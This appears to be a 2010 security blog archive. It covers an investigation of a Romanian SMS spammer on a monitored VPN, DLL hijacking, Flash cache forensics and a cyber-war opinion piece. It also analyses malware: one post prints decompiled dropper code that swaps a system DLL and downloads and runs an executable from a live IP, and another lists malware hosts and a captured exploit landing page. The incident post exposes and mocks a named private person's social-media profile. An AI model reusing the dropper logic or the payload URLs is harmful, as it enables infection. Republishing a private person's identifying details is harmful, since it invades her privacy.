Investigating a Romanian Hacker

August 31st, 2010

Introduction

Beginning on approximately May 18th, 2010 we received an email complaint relating to abuse from an IP address belonging to a network that I monitor. Early on, the FBI was directly involved in the case, so it has been treated with high regard. The compromised IP address belongs to a subnet range used for VPN access available to limited users. The account was disabled per standard procedure, but abuse continued. Further investigation suggested the hacker was of Romanian origin and has been using the network to send text message oriented spam since at least May 2010. The hacker continued to abuse the network for an extended period despite our having disabled 10-15 accounts and blocked several network blocks.

The Case

This compromise set represents an interesting case study for several reasons. First, the attacker maintained persistent access for several months. This access continued despite a well trained defensive team and a relatively unsophisticated attacker. Second, despite being familiar with SPAM and even having received numerous unsolicited text messages, I was relatively unaware of text message spam as a business. This attacker was very regimented and deployed numerous text messaging spam techniques, and I assume generated reasonable profits. Finally, we spent time investigating this attacker, which resulted in pictures of the likely attacker, or at least of someone who is likely closely associated with the attacker; despite this information and the involvement of the FBI, the attacker is little threatened.

Initial Reporting

The initial indicator for this compromise set was an email from a website that provides text messaging services. We have concerns regarding the overall legitimacy of the business given their primary revenue model appears to be a referral network and sending mass text messages. However, the website owner contacted us because a stolen credit card was used in purchasing their services from an IP address belonging to a network that I monitor.

We initially determined the account was compromised and disabled the user. Unfortunately, the problem resurfaced.

Given that this was a second known incident and that the FBI was involved we decided to dig more into this compromise to ensure the problem was solved and that other instances of the same issue were not continuing undiscovered.

When we examined the logs we again saw that the two incidents were linked by IP address. Upon closer investigation we also discovered the hostname appeared to be the same.

As the incidents were almost certainly linked, we decided to continue our analysis to ensure the problem did not continue to resurface.

What we’re seeing

The attacker is primarily sending text message oriented spam (see next few screenshots).

The attacker is using numerous tools to send SPAM. The spam is generally related to Voice and Text messaging services. Email to SMS gateways are spammed. Likewise SIP, Skype, and Yahoo Voice also appear to be abused. We suspect the attacker generates profit by driving telephone calls or text messages as indicated in the SPAM. The attacker is very regimented; generally logging in on week days around 3pm EST (approximately 10 pm in Bucharest) and sending SPAM throughout the night.

Other Activity

In the next screenshot we see the attacker accessing a US based system via FTP. While it may be possible our attacker has a legitimate reason to access this system, it is probably safer to assume this system (69.147.83.173 – an IP owned by Yahoo) is being attacked as well. This likely significantly increases the legal exposure, given that an organizational IP appears to be compromising or attempting to compromise a remote web server.

Who is doing this?

Next we attempt to identify the attacker by following the various logs and traffic history. We have already observed that all IP addresses appear to originate in Romania. But it is conceivable that the attacker is merely pivoting from another system or compromised account. But let’s start with the IP address:

Next we look at traffic originating from the compromised VPN account. We see an automated weather beacon querying MSN weather for a Romanian area.

Next, we see the user using a Romanian Google portal with a browser set to use the Romanian Character set.

We also see Skype querying a Romanian variant. The combination of a Romanian IP address, Romanian Language settings, a Romanian weather beacon, Romanian Google, and Romanian Skype gives us high confidence that the attacker is in-fact Romanian.

We continue to closely monitor the situation. We disable numerous accounts but continue to observe compromised accounts by IP and by hostname. On July 11th, the attacker makes a significant mistake by logging into facebook. As shown below this exposes both a facebook user ID and a yahoo email address.

Again seeing the hostname, the Romanian language settings, and the activity being in the right time frame, etc we are confident this is our attacker.

First, using the email address we examine the Yahoo profile, which claims to be a 25 year old woman named Ana from Schenectady, New York.

Next we take the Facebook cookie and examine the facebook page to again find a user named Ana.

Logging into facebook we find that Ana is from Bacau, Romania.

A close up picture:

And she might be single….

As you can see from above, she appears to have clicked on a Match.com link.

Analysis of the Attacker

With a strong degree of confidence we believe the attacker is the Romanian woman. This is supported by the IP addresses of the attack, browser settings, weather beacons, and the Facebook page. We know the attacker logged in as the Facebook user “Ana Maria”. This fact does not necessarily indicate that the Facebook user is the attacker, but the attacker certainly had access to a system with the Facebook credentials for that user. That system is the same system using compromised user accounts and sending text spam for several months. Additionally, the user in the Facebook profile is in the expected geographic area. Therefore it seems likely the Facebook user is the attacker or a close associate.

Mitigations to date

We made numerous efforts to block this user. We have performed the following remediation activities:

  • Blocked SSL VPN connections from a specified IP range
  • Created an ACL to block a specified IP range
  • Disabled approximately 15 accounts
  • Throttled login attempts on the SSL VPN

Despite these mitigations the attacker was able to maintain access using simple side-steps. She cycled through numerous accounts. When we blocked her IP address she switched to a different range. When we blocked that range, she used another VPN account to log into our VPN.
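The pivot that held this case together was the client hostname, which stayed constant while accounts and source ranges changed. As an added example (not code from the original post), the script below correlates VPN session records on that hostname and flags three things the mitigation list above would want surfaced: one client cycling through several accounts, one client hopping between address ranges after a block, and any login from a range that is supposed to be blocked. The log format, user names, hostnames and addresses (RFC 5737 documentation ranges) are constructed for the example.

```python
import ipaddress
from collections import defaultdict

# Constructed VPN session log ("timestamp user source_ip client_hostname").
# Users, addresses and hostnames are invented for this example; they are
# not taken from the incident described in the post.
VPN_LOG = """\
2010-06-01T19:02:11 jsmith 10.200.1.14 JSMITH-LAPTOP
2010-06-01T19:05:40 alee 192.0.2.17 CLIENT-7F2A
2010-06-02T19:01:03 alee 192.0.2.17 CLIENT-7F2A
2010-06-03T19:10:55 bkim 192.0.2.88 CLIENT-7F2A
2010-06-04T19:00:12 ctran 198.51.100.9 CLIENT-7F2A
2010-06-05T19:03:30 dpark 203.0.113.42 CLIENT-7F2A
2010-06-05T20:00:00 jsmith 10.200.1.14 JSMITH-LAPTOP
"""

# Ranges already blocked at the firewall/ACL (constructed). A session from
# one of them means the block is not enforced on every path into the VPN.
BLOCKED_RANGES = [ipaddress.ip_network("192.0.2.0/24")]


def parse_log(text):
    """Turn the whitespace-separated log into a list of session dicts."""
    sessions = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, ip, host = line.split()
        sessions.append({"ts": ts, "user": user,
                         "ip": ipaddress.ip_address(ip), "host": host})
    return sessions


def correlate(sessions, min_accounts=3, blocked=BLOCKED_RANGES):
    """Group sessions by client hostname and report hosts that cycle accounts,
    hop between /24 ranges, or arrive from a range that should be blocked.
    IPv4 only: the /24 grouping below does not apply to IPv6 sources."""
    by_host = defaultdict(list)
    for s in sessions:
        by_host[s["host"]].append(s)

    findings = {}
    for host, sess in by_host.items():
        accounts = sorted({s["user"] for s in sess})
        ranges = sorted({str(ipaddress.ip_network(f"{s['ip']}/24", strict=False))
                         for s in sess})
        blocked_hits = sum(1 for s in sess if any(s["ip"] in n for n in blocked))
        reasons = []
        if len(accounts) >= min_accounts:
            reasons.append("account cycling")
        if len(ranges) >= 2:
            reasons.append("range hopping")
        if blocked_hits:
            reasons.append("login from blocked range")
        if reasons:
            findings[host] = {"accounts": accounts, "ranges": ranges,
                              "blocked_hits": blocked_hits, "reasons": reasons}
    return findings


if __name__ == "__main__":
    for host, info in correlate(parse_log(VPN_LOG)).items():
        print(host, info)
```

Run as-is it reports only CLIENT-7F2A, with four accounts, three ranges and three sessions from the blocked range; the legitimate JSMITH-LAPTOP sessions stay quiet. In a real deployment the hostname comes from the VPN concentrator's session log and the blocked ranges from the ACL, and the "login from blocked range" reason is the one worth paging on, since it means a block exists on paper but not on the path the attacker is using.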

Summary

We have learned several lessons from this on-going case. Foremost is our inability to directly mitigate ongoing attacks. We are extremely limited in the mechanisms we can utilize to prevent determined attackers. This attacker did NOT use sophisticated tools or techniques but has successfully utilized our network despite our efforts to prevent unauthorized use for an extended period. We knew exactly what the attacker was doing, who she was, and had several additional strategies to block her. However, organizational difficulties slowed this process. A key lesson learned is that we must develop internal communication processes with other groups to ensure that our detection and understanding of an attack can be translated into effective mitigations. Additionally, as someone who has spent serious time performing penetration tests and writing custom tools, I would have hoped to have fared better against this attacker given that I presume to know her business fairly well. Alas, defense is much harder.

DLL Insecurity

August 25th, 2010

There has been much written in regards to the wave of DLL binary hijacking and most of the analysis is very good. However, while trying to explain the vulnerability I’ve faced two questions over and over: One, why does this affect so many applications, and Two, how might these vulnerabilities be used.

In answer to one, the problem is a library architecture problem. Some people have blamed Microsoft for the issue. In particular, I saw MS criticized for including the Current Working Directory (CWD) in the path. Honestly, I can’t imagine doing otherwise. I’m pretty sure most applications would fall apart if the CWD wasn’t included in the path. A few sanity checks would be nice, and this is essentially what MS’s new registry settings provide. But for me, the problem is that developers are loading libraries without knowing explicitly what they are. Sure this helps out when there are shared libraries, but ultimately you can’t secure an application if developers don’t check what they’re executing. As a development architecture problem across many applications, there is no simple fix.

Digging into the problem, I demonstrate it with the following short program:

Microsoft explicitly advises against using SearchPath to help load a library, but developers seem to love doing things like this. If the user browses to a directory to open a media file, the CWD changes, and SearchPath looks there and happily returns a path to a planted malicious DLL.
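To make the search-order point concrete, here is an added example (not the program from the original post, which was a screenshot) that emulates the documented directory search orders for a DLL requested by bare name and resolves two names against a constructed directory tree: one DLL that really exists in the system directory, and one optional DLL that is not installed at all. The three orders are the SearchPath()/legacy LoadLibrary order with the CWD second, the SafeDllSearchMode order with the CWD after the system and Windows directories, and a search with the CWD removed (what the CWDIllegalInDllSearch policy or SetDllDirectory("") achieves). The 16-bit system directory is left out, and the file names are invented.

```python
import os
import tempfile

# Directory search orders for a DLL requested by bare name, as documented
# by Microsoft (16-bit system directory omitted for brevity):
#   unsafe: SearchPath() default, and LoadLibrary with SafeDllSearchMode off
#   safe:   LoadLibrary with SafeDllSearchMode on (default since XP SP2)
#   no_cwd: current directory removed from the search entirely, as with the
#           CWDIllegalInDllSearch policy or SetDllDirectory("")
DLL_SEARCH_ORDERS = {
    "unsafe": ["app", "cwd", "system", "windows", "path"],
    "safe":   ["app", "system", "windows", "cwd", "path"],
    "no_cwd": ["app", "system", "windows", "path"],
}


def resolve(name, order, dirs):
    """Return the label of the first directory in `order` that holds `name`,
    or None when the search falls through (LoadLibrary would fail)."""
    for label in order:
        if os.path.isfile(os.path.join(dirs[label], name)):
            return label
    return None


def build_demo_tree(root):
    """Constructed layout: codec.dll genuinely installed in the system
    directory, and a 'media' folder (the CWD after the user browsed to it)
    carrying two planted DLLs: one shadowing codec.dll and one supplying an
    optional.dll that the application wants but nobody installed."""
    dirs = {label: os.path.join(root, label)
            for label in ("app", "cwd", "system", "windows", "path")}
    for d in dirs.values():
        os.makedirs(d)
    for d, name in ((dirs["system"], "codec.dll"),
                    (dirs["cwd"], "codec.dll"),
                    (dirs["cwd"], "optional.dll")):
        open(os.path.join(d, name), "w").close()   # empty stand-in files
    return dirs


def run_demo():
    """Resolve both names under each order; returns {(mode, name): label}."""
    with tempfile.TemporaryDirectory() as root:
        dirs = build_demo_tree(root)
        return {(mode, name): resolve(name, order, dirs)
                for mode, order in DLL_SEARCH_ORDERS.items()
                for name in ("codec.dll", "optional.dll")}


if __name__ == "__main__":
    for (mode, name), hit in sorted(run_demo().items()):
        print(f"{mode:7} {name:13} -> {hit}")
```

The output shows why the bug is so widespread: the safe order protects codec.dll (the system copy wins), but optional.dll still resolves to the planted copy in the CWD because nothing earlier in the order has it. Any DLL an application probes for and tolerates missing is therefore hijackable even with SafeDllSearchMode on; only removing the CWD from the search, or loading by fully qualified path, closes that case.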

Two, I haven’t seen these exploits in the wild. Exploit-DB is being overwhelmed with POCs but I haven’t seen realistic attack vectors actually used. With minimal testing here are a few cases that I’m worried about:

  • A user unknowingly having a writable SMB share exposed to the Internet with media files located on the share. An attacker writes an appropriate, and possibly hidden, DLL to the share. When a user later accesses the media files, they are compromised.
  • A user attempting to download a media file, such as a movie, from a malicious webserver. If the targeted media file is linked correctly via SMB or WebDAV and an appropriate DLL is also in the directory, the user may be compromised.
  • A user is compromised by a typical client side vector – downloading a malicious PDF, JAR, or EXE. That malware then downloads various DLLs and hides them in every network share it can find and compromises any network user who opens the targeted files.

Numerous applications seem vulnerable such as uTorrent, DivX player, Skype, PowerPoint, etc and users love to click things. There’s a lot of hype with this old bug, but I expect things could get messy.

Flash “Cookies”

August 23rd, 2010

Mandiant released/updated their Web History tool recently. It’s a nice utility but it forgets about an important source of web history data – Flash “cookies”. By cookies I actually mean remnant files and directories related to caching Flash data. They don’t provide a plethora of data, but it’s a quick way to determine where users have used flash even after they clear their browser history.

Here’s a quick hack to dump visited websites from Flash cache files and the timestamps. This works in my exceptionally limited testing, but you should probably use something better than a POC for anything important:


#!/usr/bin/python
# mjw@cyberwart.com
# USAGE: dumpflashhistory.py
# eventually will add optional <-u username>
# NOTES: this is only a quick hack

import os
import sys
import time


def get_flashdirs():
    """Flash Player's per-user cache locations (Windows XP-era profile layout)."""
    base_dir = os.getenv('USERPROFILE')
    if base_dir is None:
        sys.exit("USERPROFILE is not set; run this from the user's Windows profile")
    flash_root = os.path.join(base_dir, "Application Data", "Macromedia", "Flash Player")
    return [
        os.path.join(flash_root, "macromedia.com", "support", "flashplayer", "sys"),
        os.path.join(flash_root, "#SharedObjects"),
    ]


def dedupe_sorted(arr):
    """Drop adjacent duplicates from an already sorted list."""
    last = None
    ret = []
    for x in arr:
        if x != last:
            ret.append(x)
        last = x
    return ret


def looks_like_site_dir(name):
    # Site directories look like "www.example.com"; skip short random IDs and .swf names
    return name.rfind('.', 4) > 0 and "\\ " not in name and name.rfind(".swf", 4) < 0


def get_flash_history(dirs):
    flash_dirs = []
    for d in dirs:
        for root, subdirs, files in os.walk(d):
            for dd in subdirs:
                if looks_like_site_dir(dd):
                    st = os.stat(os.path.join(root, dd))
                    # accessed / modified / created times of the site directory
                    stamps = [time.ctime(t) for t in (st.st_atime, st.st_mtime, st.st_ctime)]
                    flash_dirs.append(dd + "  " + "  ".join(stamps))

    flash_dirs.sort()
    for x in dedupe_sorted(flash_dirs):
        print(x)


if __name__ == "__main__":
    get_flash_history(get_flashdirs())

Why “Cyber War” hype makes my blood boil

July 8th, 2010

The cyber war debate is raging again. I assume this is because it’s summer and everyone is bored. There was a recent debate between Bruce Schneier and former NSA director Michael Hayden. Schneier argued that “Cyber war” has been grossly over hyped and the general argued that cyber war is a very real threat.

Next we have Richard Bejtlich arguing that there is cyberwar here and here. He even goes on to argue the Chinese have “downed” F-22 fighters. His premise being that because some IP address in China was associated with an Internet compromise of a related defense contractor reported in April, the Chinese government has developed sufficient countermeasures to mitigate the prowess of the F-22 and thus it shouldn’t be purchased. Likewise not purchasing is apparently equivalent to destroying. He also claims to have special knowledge of the attack. I can only imagine that any special knowledge would be classified and that if he had the knowledge he couldn’t even reference it. Of course this is only speculation, but if one wants to debate an issue let’s talk about verifiable evidence rather than unsubstantiated hyperbole.

Others including Sourcefire have jumped on the bandwagon, and Schneier posted a blog entry re-articulating his position.

My problem isn’t with Cyber War – it’s with the hyperbole. Every bit of evidence in the public space is consistent with run of the mill criminal activity. Aurora had links back to South Korea and Florida – as well as China. The infamous CRC code wasn’t uniquely Chinese. The F22 information compromise wouldn’t be considered war if a spy had grabbed papers physically – it would be classic espionage. Why would the medium suddenly change the nature of the event?

It’s easy to say just call *this stuff* “cyber war”. I’m not being resistant just to be pedantic. Rather, I think there’s a level of attack that could escalate well beyond the petty criminal or even espionage. Yes, the electric system is vulnerable. Yes it’s been speculated that hackers caused a sewage spill (I believe in Australia IIRC). I think these items begin to broach the warfare threshold. For instance, if a computer attack exploited a power system, blew up a generator and caused a cascading power failure – the destructive impact might be similar to a cruise missile destroying the same target (though that is a wild guess). There would be possible loss of life and massive economic damage. But things could still get worse: imagine if enemy combatants could take control of a Predator and attack US troops; or if they could switch blue (friendly) and red (enemy) forces inside a blue force tracking system. Going crazy with speculative FUD I could even speculate that a determined attacker at a nation state level could hack a common autopilot system and cause it to engage and rapidly descend on landing – the result being horrific and definitely war-like. Because these attacks are conceivable it’s important to maintain a reasonable threshold for “cyber war”. If not we will lack even the basic language to prepare to appropriately defend ourselves.

Again, the above is merely speculative FUD, but it has been my experience that all software is breakable given sufficient time and expertise. Rather than contractors stealing billions from the government in non-sensical products and services that make us no safer, or the NSA eroding our privacy, we should have serious discussions. Computers control huge aspects of life and could be leveraged to do serious damage. But “cyber war” as currently described only lessens the conversation. The scary thing is that serious professionals are calling this stuff “war”, they say we’re losing (we are), but they think these low level attacks are nation states.

For instance, say I have a military force that needs to be trained. They’re to support the war on crime in south east DC. South east can be a very violent place; there’s lots of crime, lots of armed men, and a high homicide rate. If I train them for “Crime war” they will likely be very adept at that mission. However, if they’re destined to fight a “war war” they will likely be entirely unprepared to face (say) the Chinese Army. You can imagine what might happen in those circumstances. I think the same is likely to be the case if we prepare defenses for cyber war by confusing it with cyber crime. Instead of addressing the real threats of cyber war everyone is running around shouting cyber war over weak criminal attacks trying to sell an inappropriate service or tool.

Adobe Acrobat-Flash Payload

June 9th, 2010

I hate the AV industry. Symantec does a fairly good write up, but they block out the attacking system. This is completely absurd. Every admin needs to know where the payload is going to. Symantec apparently feels you have to be important or pay for the info. Fuck Symantec. Here’s the main from one of the samples:


int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
HANDLE v5; // eax@8
HRSRC v6; // esi@10
DWORD v7; // ebp@10
HANDLE v8; // esi@10
const void *v9; // eax@10
HRSRC v10; // esi@10
DWORD v11; // edi@10
HGLOBAL v12; // ebx@10
HANDLE v13; // esi@10
const void *v14; // eax@10
DWORD NumberOfBytesWritten; // [sp+8h] [bp-C68h]@10
HGLOBAL hResData; // [sp+Ch] [bp-C64h]@10
const CHAR ServiceName[4]; // [sp+10h] [bp-C60h]@1
char v18; // [sp+15h] [bp-C5Bh]@1
__int16 v19; // [sp+10Dh] [bp-B63h]@1
char v20; // [sp+10Fh] [bp-B61h]@1
CHAR Buffer; // [sp+110h] [bp-B60h]@1
const CHAR v22[260]; // [sp+214h] [bp-A5Ch]@2
const CHAR ExistingFileName; // [sp+318h] [bp-958h]@3
const CHAR MultiByteStr; // [sp+41Ch] [bp-854h]@2
const CHAR v25; // [sp+520h] [bp-750h]@4
char v26; // [sp+560h] [bp-710h]@4
char v27; // [sp+561h] [bp-70Fh]@4
__int16 v28; // [sp+61Dh] [bp-653h]@4
char v29; // [sp+61Fh] [bp-651h]@4
char v30; // [sp+620h] [bp-650h]@2
const CHAR v31[260]; // [sp+724h] [bp-54Ch]@2
const CHAR CmdLine; // [sp+828h] [bp-448h]@5
struct _WIN32_FIND_DATAA FindFileData; // [sp+928h] [bp-348h]@4
const CHAR FileName; // [sp+A68h] [bp-208h]@3
char NewFileName; // [sp+B6Ch] [bp-104h]@2

strcpy((char *)ServiceName, "BITS");
memset(&v18, 0, 0xF8u);
v19 = 0;
v20 = 0;
if ( !GetSystemDirectoryA(&Buffer, 0x104u)
|| (sprintf(&NewFileName, "%s\\dllcache\\qmgr.dll", &Buffer),
sprintf((char *)&MultiByteStr, "%s\\qmgr.dll", &Buffer),
sprintf((char *)v22, "%s\\kernel64.dll", &Buffer),
sprintf((char *)v31, "%s\\es.ini", &Buffer),
!GetWindowsDirectoryA(&v30, 0x104u)) )
return -1;
sprintf((char *)&ExistingFileName, "%s\\EventSystem.dll", &v30);
sprintf((char *)&FileName, "%s\\ServicePackFiles\\i386\\qmgr.dll", &v30);
if ( CheckIfLocalAccountIsAdmin() )
{
v5 = FindFirstFileA(&ExistingFileName, &FindFileData);
if ( v5 != (HANDLE)-1 )
{
FindClose(v5);
return -1;
}
NumberOfBytesWritten = 0;
v6 = FindResourceA(0, (LPCSTR)0x65, "SERV_DLL");
v7 = SizeofResource(0, v6);
hResData = LoadResource(0, v6);
v8 = CreateFileA(&ExistingFileName, 0x1F03FFu, 7u, 0, 2u, 0xA0u, 0);
v9 = LockResource(hResData);
WriteFile(v8, v9, v7, &NumberOfBytesWritten, 0);
CloseHandle(v8);
v10 = FindResourceA(0, (LPCSTR)0x66, "SERV_INI");
v11 = SizeofResource(0, v10);
v12 = LoadResource(0, v10);
v13 = CreateFileA(v31, 0x1F03FFu, 7u, 0, 2u, 0xA0u, 0);
v14 = LockResource(v12);
WriteFile(v13, v14, v11, &NumberOfBytesWritten, 0);
CloseHandle(v13);
if ( ManipulateBITSService(ServiceName, 4u) == -1
|| (StopBITS(ServiceName),
Sleep(1u),
DisableWindowsFileProtection(&MultiByteStr),
Sleep(1u),
ReplaceOriginalQMGR_DLLwithEventSystem_DLL(
&NewFileName,
(int)v22,
(int)&MultiByteStr,
&ExistingFileName,
&FileName) == -1)
|| (SetFakeQMGRToOriginalQMGRFiletime((int)&ExistingFileName, v22),
SetFakeQMGRToOriginalQMGRFiletime((int)&MultiByteStr, v22),
SetFakeQMGRToOriginalQMGRFiletime((int)v31, v22),
ManipulateBITSService(ServiceName, 2u) == -1)
|| StartBITS(ServiceName) == -1 )
return -1;
}
else
{
CoInitialize(0);
memcpy((void *)&v25, "hXXp://210.211.31.214/img/xslu.exe", 0x40u);
v26 = aHttp210_211_31[64];
memset(&v27, 0, 0xBCu);
v28 = 0;
v29 = 0;
if ( !GetEnvironmentVariableA("TEMP", (LPSTR)&FindFileData, 0x100u)
|| (sprintf((char *)&CmdLine, "%s\\1yxf.exe", &FindFileData),
DeleteUrlCacheEntry(&v25),
URLDownloadToFileA(0, &v25, &CmdLine, 0, 0))
|| WinExec(&CmdLine, 0) <= 0x1F )
return -1;
}
return 0;
}


In case you missed it
hxxp://210.211.31.214/img/xslu.exe
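The WinMain above gives an admin more than the download URL: the sprintf calls spell out every file the dropper touches, and SetFakeQMGRToOriginalQMGRFiletime shows that the replaced qmgr.dll copies get the original file times, so timestamps cannot be trusted. As an added example (not code from the post or from the sample), the script below checks a Windows directory tree for those artifacts: kernel64.dll and es.ini in system32, EventSystem.dll in the Windows directory, disagreement between the three qmgr.dll copies the code references, and a system32\qmgr.dll whose content equals the dropped EventSystem.dll. The helper that performs the swap is not shown in the listing, so which qmgr.dll copies it overwrites is an assumption; the file contents here are constructed, and the check is demonstrated against a constructed clean tree and a constructed infected one.

```python
import hashlib
import os
import tempfile

# Paths the decompiled dropper writes, relative to the Windows directory
# (taken from the sprintf calls in WinMain above).
ARTIFACTS = [
    os.path.join("system32", "kernel64.dll"),
    os.path.join("system32", "es.ini"),
    "EventSystem.dll",
]
QMGR_COPIES = [
    os.path.join("system32", "qmgr.dll"),
    os.path.join("system32", "dllcache", "qmgr.dll"),
    os.path.join("ServicePackFiles", "i386", "qmgr.dll"),
]


def sha256_of(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()


def check_windows_tree(windir):
    """Return a list of finding strings for one Windows directory tree."""
    findings = []
    for rel in ARTIFACTS:
        if os.path.exists(os.path.join(windir, rel)):
            findings.append(f"unexpected file present: {rel}")
    # The dropper stamps replaced copies with the original file times, so
    # compare content hashes rather than timestamps.
    hashes = {rel: sha256_of(os.path.join(windir, rel))
              for rel in QMGR_COPIES if os.path.isfile(os.path.join(windir, rel))}
    if len(set(hashes.values())) > 1:
        findings.append("qmgr.dll copies differ: " + ", ".join(sorted(hashes)))
    qmgr = os.path.join(windir, "system32", "qmgr.dll")
    dropped = os.path.join(windir, "EventSystem.dll")
    if os.path.isfile(qmgr) and os.path.isfile(dropped) and sha256_of(qmgr) == sha256_of(dropped):
        findings.append("system32 qmgr.dll content matches dropped EventSystem.dll")
    return findings


def _write(windir, rel, data):
    path = os.path.join(windir, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)


def build_tree(windir, infected):
    """Constructed trees. Clean: three identical qmgr.dll copies. Infected
    (assumed swap behaviour): system32 qmgr.dll replaced by the dropped DLL,
    the original parked as kernel64.dll, es.ini and EventSystem.dll dropped."""
    real_qmgr = b"original qmgr.dll bytes (constructed)"
    fake_qmgr = b"dropped SERV_DLL resource bytes (constructed)"
    _write(windir, os.path.join("system32", "dllcache", "qmgr.dll"), real_qmgr)
    _write(windir, os.path.join("ServicePackFiles", "i386", "qmgr.dll"), real_qmgr)
    if not infected:
        _write(windir, os.path.join("system32", "qmgr.dll"), real_qmgr)
        return
    _write(windir, os.path.join("system32", "qmgr.dll"), fake_qmgr)
    _write(windir, os.path.join("system32", "kernel64.dll"), real_qmgr)
    _write(windir, os.path.join("system32", "es.ini"), b"[constructed ini]")
    _write(windir, "EventSystem.dll", fake_qmgr)


def run_demo():
    """Returns (findings_on_clean_tree, findings_on_infected_tree)."""
    results = []
    for infected in (False, True):
        with tempfile.TemporaryDirectory() as windir:
            build_tree(windir, infected)
            results.append(check_windows_tree(windir))
    return tuple(results)


if __name__ == "__main__":
    clean, infected = run_demo()
    print("clean:", clean)
    print("infected:", infected)
```

Point check_windows_tree at a real %SystemRoot% (read-only; it only hashes and stats) and the artifact-presence findings are the strong ones. The qmgr.dll comparison is a supporting signal: if the dropper overwrote every copy it would stay silent, which is exactly why the admin wants the callback address and not just a vendor signature.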

JDT Malware: Bob’s Homepage

May 10th, 2010

Just a heads up on some IPs we’re seeing hosting malware:

[5/10/10 12:29:31 PM] mjw: 68.168.216.6 is malware
[5/10/10 12:29:41 PM] mjw: 82.211.7.32 malware
[5/10/10 12:29:46 PM] mjw: 83.169.37.246 malware
[5/10/10 12:30:06 PM] mjw: 91.203.133.223 malware
[5/10/10 12:30:18 PM] mjw: petwife.ru malware
[5/10/10 12:31:02 PM] mjw: 78.41.156.236 malware
[5/10/10 12:31:12 PM] mjw: 87.110.220.31 malware
[5/10/10 12:31:16 PM] mjw: prealpole.ru malware
[5/10/10 12:32:04 PM] mjw: 88.191.79.223 malware
[5/10/10 12:32:13 PM] mjw: 188.72.211.253 malware
[5/10/10 12:32:18 PM] mjw: wovenshelf.ru malware

Contents like:

HTTP/1.1 200 OK{D}{A}
Server: nginx{D}{A}
Date: Wed, 05 May 2010 04:00:01 GMT{D}{A}
Content-Type: text/html{D}{A}
Connection: close{D}{A}
Expires: 0{D}{A}
Pragma: no-cache{D}{A}
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0{D}{A}
Cache-Control: private{D}{A}
Content-Length: 1270{D}{A}
{D}{A}
< html > < head > < title > Bob’s Homepage < /title > < /head > < body > < applet width='100%' height='100%' code='JavaFX' archive='Games.jar' > < param name='site' VALUE='Njg3NDc0NzAzQTJGMkY3MzcwNjU2QzZDNkM2RjYxNjQyRTcyNzUyRjc3NjU2QzYzNkY2RDY1MkU3MDY4NzAzRjY5NjQzRDMxMzEyNjcwNjk2NDNEMzIyNjYyMzA=' > < /applet > < applet code='quote.GReader.class' archive='NewGames.jar' width='215' height='154' > < param name='data' VALUE='hxxp://spellload.ru/welcome.php?id=9&pid=2&1=1' > < param name='cc' value='1' > < /applet > < script > {A}
var u = “hxxp: -J-jar -J\\\\70.86.147.162\\public\\002.jar none”;{A}
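As an added example (not from the original post), here is a small parser for this landing-page format: it pulls the applet archives and parameters out of the HTML and peels both layers off the site parameter, which is base64 over the ASCII hex of a URL. The sample page is the capture above with the blog's extra spaces inside tags removed and the base64 value rejoined on one line; everything else is as captured. The decoded site value points at the same spellload.ru welcome.php path as the second applet's data parameter.

```python
import base64
import binascii
from html.parser import HTMLParser

# Landing page reconstructed from the capture above (spaces inside tags
# removed, base64 rejoined); the defanged hxxp:// values are left as captured.
SAMPLE_PAGE = """<html><head><title>Bob's Homepage</title></head><body>
<applet width='100%' height='100%' code='JavaFX' archive='Games.jar'>
<param name='site' VALUE='Njg3NDc0NzAzQTJGMkY3MzcwNjU2QzZDNkM2RjYxNjQyRTcyNzUyRjc3NjU2QzYzNkY2RDY1MkU3MDY4NzAzRjY5NjQzRDMxMzEyNjcwNjk2NDNEMzIyNjYyMzA='>
</applet>
<applet code='quote.GReader.class' archive='NewGames.jar' width='215' height='154'>
<param name='data' VALUE='hxxp://spellload.ru/welcome.php?id=9&pid=2&1=1'>
<param name='cc' value='1'>
</applet>
</body></html>"""


class AppletCollector(HTMLParser):
    """Collect every <applet> with its code, archive and <param> children.
    HTMLParser lowercases tag and attribute names, so VALUE becomes value."""

    def __init__(self):
        super().__init__()
        self.applets = []
        self.current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "applet":
            self.current = {"code": a.get("code"), "archive": a.get("archive"), "params": {}}
            self.applets.append(self.current)
        elif tag == "param" and self.current is not None:
            self.current["params"][a.get("name")] = a.get("value")

    def handle_endtag(self, tag):
        if tag == "applet":
            self.current = None


def decode_site_param(value):
    """Undo the two layers on 'site': base64 -> ASCII hex digits -> URL."""
    hex_text = base64.b64decode("".join(value.split())).decode("ascii")
    return binascii.unhexlify(hex_text).decode("ascii")


def analyze(page):
    """Return one dict per applet, adding site_decoded where a site param exists."""
    collector = AppletCollector()
    collector.feed(page)
    out = []
    for ap in collector.applets:
        params = dict(ap["params"])
        if "site" in params:
            try:
                params["site_decoded"] = decode_site_param(params["site"])
            except (binascii.Error, UnicodeDecodeError) as exc:
                params["site_decoded"] = f"<undecodable: {exc}>"
        out.append({"code": ap["code"], "archive": ap["archive"], "params": params})
    return out


if __name__ == "__main__":
    for applet in analyze(SAMPLE_PAGE):
        print(applet["archive"], applet["code"], applet["params"])
```

The point of running a parser rather than eyeballing the capture is that the two applets carry their URLs in different encodings, and the encoded one is the one a naive string search for the host name misses; feeding proxied responses through analyze() turns both into plain indicators for the blocklist above.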

Good Bye Facebook

May 3rd, 2010

I like facebook. I was a student when Facebook was first developed. “Back in the day” many universities, including mine, gave freshmen a “face book”. Basically it was a picture book with all the incoming freshmen and their names. It was a mechanism to help you meet people. Facebook.com was the very savvy digital evolution of that concept. As a geek the useful digital evolution of a paper product was very cool to me. Since then it has greatly expanded and evolved to fit a different purpose. One of its best utilities is catching up with old friends. I’ll greatly miss this use. Unfortunately, big business has mutated a lovely utility into a shameful invasion of privacy.

I was just surfing CNN and noticed I was logged into CNN via facebook. I was logged into facebook, but I can’t recall ever giving CNN the okay to access my facebook information. Additionally, there’s a Visual Studio 2010 ad – which I’m guessing is targeted. This implies that facebook is tracking the sites I visit and collaborating/conspiring with marketers to track my internet usage to better market products and make money. Alas, this is just too far for me. I’m going to say goodbye to facebook in the near future and would advise others to do the same.

JDT Exploit

April 26th, 2010

